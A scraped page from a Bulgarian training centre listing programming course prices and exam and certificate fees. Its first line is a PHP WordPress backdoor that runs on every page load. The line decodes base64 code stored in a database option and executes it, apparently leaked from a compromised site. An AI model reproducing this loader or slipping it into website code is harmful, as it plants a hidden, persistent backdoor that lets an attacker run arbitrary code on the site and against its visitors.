add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Цени и такси - НАРС

Цени на курсове и такси

Цени на курсове

Цени на курсове
Курс Цена Продължителност
Основи на програмирането 120 лева 12 учебни часа
Въведение в програмирането с Java 375 лева 40 учебни часа
Въведение в програмирането със C# 375 лева 40 учебни часа
Въведение в програмирането със C++ 416 лева 52 учебни часа
Въведение в програмирането със C 375 лева 40 учебни часа
Java Fundamentals 750 лева 68 учебни часа
Core Java 2880 лева 240 учебни часа
.NET Fundamentals 750 лева 68 учебни часа
Core .NET 2880 лева 240 учебни часа
Advanced C++ 750 лева 68 учебни часа
Core C++ 2880 лева 240 учебни часа
Java EE Web Development 1 350 лева 32 учебни часа
Java EE Web Development 2 350 лева 32 учебни часа
Android for Mobile Devices 1 320 лева 32 учебни часа
Android for Mobile Devices 2 400 лева 40 учебни часа
iOS for iPhone 1 320 лева 32 учебни часа
iOS for iPhone 2 400 лева 40 учебни часа
Web: HTML + JavaScript + CSS 450 лева 40 учебни часа
PHP and MySQL Web Development 1 470 лева 40 учебни часа
PHP and MySQL Web Development 2 480 лева 41 учебни часа
Основи на софтуерното тестване 190 лева 16 учебни часа

Такси

Такси
Изпит/Сертификат Цена
Изпит след курс “Въведение в програмирането” 45 лева
Изпит след курс “Java/.NET Fundamentals” – теория и практика 80 лева
Изпит след курс “Java EE Web Development” – теория и практика 80 лева
Изпит след курс “Java/.NET Fundamentals” – теория 40 лева
Изпит след курс “Java EE Web Development” – теория 40 лева
Изпит след курс “PHP and MySQL Web Development” – теория и практика 80 лева
Изпит след курс “PHP and MySQL Web Development” – теория 40 лева
Издаване на сертификат на български за курс приключил 2017 година 30 лева
Издаване на сертификат на английски за курс приключил 2017 година 30 лева
Издаване на сертификати на български и на английски за курс приключил 2017 година 40 лева
Издаване на сертификат за курс приключил преди 2017 година при запитване
Издаване на административна справка 20 лева

 

Посочените цени са крайни и са в български лева.

Цените са за обучение в група. За индивидуално обучение цената се договаря допълнително.

За ученици, студенти, учители и безработни предлагаме 5% отстъпка от регулярната цена.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad